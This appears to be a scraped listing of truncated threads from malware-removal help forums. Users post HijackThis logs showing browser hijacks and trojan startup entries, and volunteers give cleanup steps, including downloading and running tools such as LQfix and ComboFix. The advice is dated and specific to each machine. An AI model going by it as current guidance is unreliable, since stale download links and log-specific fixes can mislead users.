You MUST move HiJackThis.exe to a permanent folder like C:\HJT!!!

Print this and boot to safe mode
Fix these with HJT

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/cus.../search/ie.html

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://red.clientapps.yahoo.com/cus...//www.yahoo.com

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://69.50.160.100/

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://red.clientapps.yahoo.com/cus...//www.yahoo.com

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/cus.../search/ie.html

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://red.clientapps.yahoo.com/cus...//www.yahoo.com

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://69.50.160.100/

R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://red.clientapps.yahoo.com/cus...//www.yahoo.com

O2 - BHO: STIEbarBHO Class - {D797AD6C-6447-4DB4-91D0-090344408E72} - C:\Program Files\0CAT YellowPages\STIEbar.dll

O3 - Toolbar: 0CAT Yellow Pages - {679695BC-A811-4A9D-8CDF-BA8C795F261A} - C:\Program Files\0CAT YellowPages\STIEbar.dll

O4 - HKLM\..\Run: [Windows Service] C:\WINDOWS\System32\prvdi.exe

O4 - HKCU\..\Run: [Windows Service] C:\WINDOWS\System32\prvdi.exe

O9 - Extra button: My button - {47FE5D70-9AA2-40F1-9C6B-12A255F085EA} - C:\Program Files\0CAT Yel... Read more

2 more replies
Answer Match 61.74%

Hello folks, thanks for any help/advice....

I got rid of some Trojans, such as;
Trojan VX downloader,
Trojan VX 15, etc...

i just did a Hijack this, please look for me, and see if I need to
do anymore, Please.

Thanks, Lee/caveman

Logfile of HijackThis v1.99.1
Scan saved at 8:09:16 AM, on 6/10/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\mcafee.com\antivirus\oasclnt.exe
C:\Program Files\mcafee.com\personal firewall\MPfTray.exe
C:\Program Files\mcafee.com\antivirus\mcvsescn.exe
C:\Program Files\Common Files\AOL\1161914306\ee\aolsoftware.exe
C:\Program Files\Common Files\AOL\1161914306\ee\services\safetyCore\ver210_5_2_1\AOLSP Scheduler.exe
C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
C:\Program Files\Common Files\AOL\1161914306\ee\SSCEvtHdlr.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
C:\Program Files\Evidence Eliminator\ee.exe
C:\Program Files\America Online 8.0\aoltray.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\... Read more

A:Solved: got rid of trojan vx downloader,pls chk hijackthis

14 more replies
Answer Match 61.32%

Hello,
I have a trojan virus called Generic.dx!fhb which is located here C:\Windows\System32\iuypifmo.dll
My McAfee says it found the virus and quarantined it but it keeps coming back over and over. It halts my PC from working continuously. I am lucky to be here now posting this request. I have to restart numerous times.

I have attached the log from Hijackthis. Please help me!!!!
My Hijackthis log is sooo big that it would not allow me to past it in this.
I had to add it as an attachment.
 

More replies
Answer Match 60.9%

HelloBelow is my hijackthis logfile. I thought it best to submit it to the professionals such as yourselves for a report on it's status. Recently I attempted to download a program on a new install of windows; the minute I did I got attacked with a barrage of viruses, this kryptic virus was copying itself and downloading viruses by creating false files and infecting existing files all over my computer. Within seconds I had over 20 infections all over my computer, even on alternate hard drives. I did a full system scan using nod32 and then did a system restore. Then I turned off system restore, and used the best virus suite I know of and that is Nod 32 from eset to do another in depth scan. Following that scan there were no more reports of viruses. I notice it can't open all the files because sometimes on the log it says error cannot open file. Any advice on an offline virus scanner would be awesom. Anyway here is my log file and any help is greatly appreciated. Even if it isnt related to my log file but general advice regarding my infection period. Logfile of Trend Micro HijackThis v2.0.2Scan saved at 3:11:35 PM, on 30/12/2008Platform: Windows Vista SP1 (WinNT 6.00.1905)MSIE: Internet Explorer v7.00 (7.00.6001.18000)Boot mode: NormalRunning processes:C:\Windows\system32\taskeng.exeC:\Windows\system32\Dwm.exeC:\Windows\Explorer.EXEC:\Program Files\Windows Defender\MSASCui.exeC:\Program Files\Common Files\Inte... Read more

A:hijackthis logfile - Kryptic Trojan Downloader

Welcome to the BleepingComputer Forums. Since it has been a few days since you scanned your computer with HijackThis, we will need a new HijackThis log. If you have not already downloaded Random's System Information Tool (RSIT), please download Random's System Information Tool (RSIT) by random/random which includes a HijackThis log and save it to your desktop. If you have RSIT already on your computer, please run it again. Double click on RSIT.exe to run RSIT. Click Continue at the disclaimer screen. Please post the contents of log.txt. Thank you for your patience.Please see Preparation Guide for use before posting about your potential Malware problem. If you have already posted this log at another forum or if you decide to seek help at another forum, please let us know. There is a shortage of helpers and taking the time of two volunteer helpers means that someone else may not be helped. While we are working on your HijackThis log, please: Reply to this thread; do not start another! Do not make any changes on your computer during the cleaning process or download/add programs on your computer unless instructed to do so. Do not run any other tool until instructed to do so! Let me know if any of the links do not work or if any of the tools do not work. Tell me about problems or symptoms that occur during the fix. Do not run any other programs or open any other windows while doing a fix. Ask any questions that you have regarding the fix(es... Read more

2 more replies
Answer Match 60.9%

Logfile of HijackThis v1.99.1
Scan saved at 12:52:24 PM, on 5/9/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\System32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\program files\common files\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\COMMON~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\WINDOWS\System32\snmp.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\wanmpsvc.exe
C:\WINDOWS\Explorer.EXE
C:\windows\system\hpsysdrv.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\system32\ps2.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\WINDOWS\system32\igfxtray.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\AIM\aim.exe
C:\Pr... Read more

A:I ran hijackthis and want to remove trojan generic dx virus. The log file is below

Please uncheck wordwrap in notepad/format

http://users.pandora.be/bluepatchy/miekiemoes/tools/LQfix.exe to download LQfix.exe and Save it to your desktop.
Doubleclick LQfix.exe and click install.
Leave the default settings. If you change them, the fix will fail.
Make sure 'Launch LQfix' is checked. After clicking finish in the install, the fix will start.
Follow the prompts on the screen.
Your system will reboot afterwards.
Please be patient after reboot, because there is a script running in the background.
=======================
Download Superantispyware (SAS)

http://www.superantispyware.com/superantispywarefreevspro.html

Install it and double-click the icon on your desktop to run it.
It will ask if you want to update the program definitions, click Yes.
Under Configuration and Preferences, click the Preferences button.
Click the Scanning Control tab.
Under Scanner Options make sure the following are checked:
o Close browsers before scanning
o Scan for tracking cookies
o Terminate memory threats before quarantining.
o Please leave the others unchecked.
o Click the Close button to leave the control center screen.
On the main screen, under Scan for Harmful Software click Scan your computer.
On the left check C:\Fixed Drive.
On the right, under Complete Scan, choose Perform Complete Scan.
Click Next to start the scan. Please be patient while it scans your computer.
After the scan is complete a summary box will appear.... Read more

1 more replies
Answer Match 60.9%

Hi. Recently I got some kind of Trojan.Generic virus and its been slowing down my PC wuite alot. Taking about 5 minutes just to start up my computer. I have a HiJackThis log if anyone can please help.

Thanks and any help is deeply appreciated !
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 16:25:03, on 23/10/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\WINDOWS\arservice.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\PROGRA~1\AVG\AVG8\avgnsx.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\AVG\AVG8\avgemc.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\AVG\AVG8\avgcsrvx.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\ehome\ehtray.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\A... Read more

A:Trojan.Generic - Computer slowing down (HiJackThis Log included)

16 more replies
Answer Match 60.48%

i started dealing w/ the popups a week or so ago, my sister was visiting a page for myspace layouts, can't remember the name and clicked on a link when the firewall popped up saying it stopped trojan from downloading. however, that's when the popups started. i ran ad aware, remove it pro 4.1and ran norton antivirus (subscription expired months ago tho). did this several times, sometimes in safe mode, several things were removed including trojans, but the popups remained. mainly they were from outerinfo and winantispyware pro...but there are a lot of others from random websites. i found out how to uninstall outerinfo on their website, and have had no more problems with it, but the others keep coming. also, i noticed under the privacy tab of internet options the settings keep resetting to "accept all cookies". i've changed it to medium-high several times, it keeps resetting. a few times i have received a "buffer runtime error" message and the desktop reloads, sort of acts like the computer restarts but all of the programs stay on the screen.

panda log:


Incident Status Location

Adware:Adware/DnsInsider ... Read more

A:popups; Trj/Downloader.OZB, Generic Malware, Trj/Downloader.PCQ

Hello, and Welcome to TSF.

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Before beginning the fix, read this post completely. If there's anything that you do not understand, kindly ask your questions before proceeding. Ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this webpage would not be available when you're carrying out the fix.

It is IMPORTANT that you don't miss a step & perform everything in the correct order/sequence.

Once we've gotten a handle on the infection, we'll uninstall Norton (or you should renew the subscription) and get you a free Anti-Virus so the machine is protected. Having an outdated Anti-Virus program is almost like not having one at all.

---------------------------------------------------------------------------------------------
Download this file - http://download.bleepingcomputer.com...a/ComboFix.exe

* IMPORTANT !!! Place combofix.exe on your Desktop


Disconnect from the internet....pull the plug!
Go to -> Run -> paste in the following single line command & click OK

"%userprofile%\desktop\combofix.exe" /killall


Follow the prompts. Type "1" and press Enter to begin the scan.
Your desktop may go blank. ... Read more

19 more replies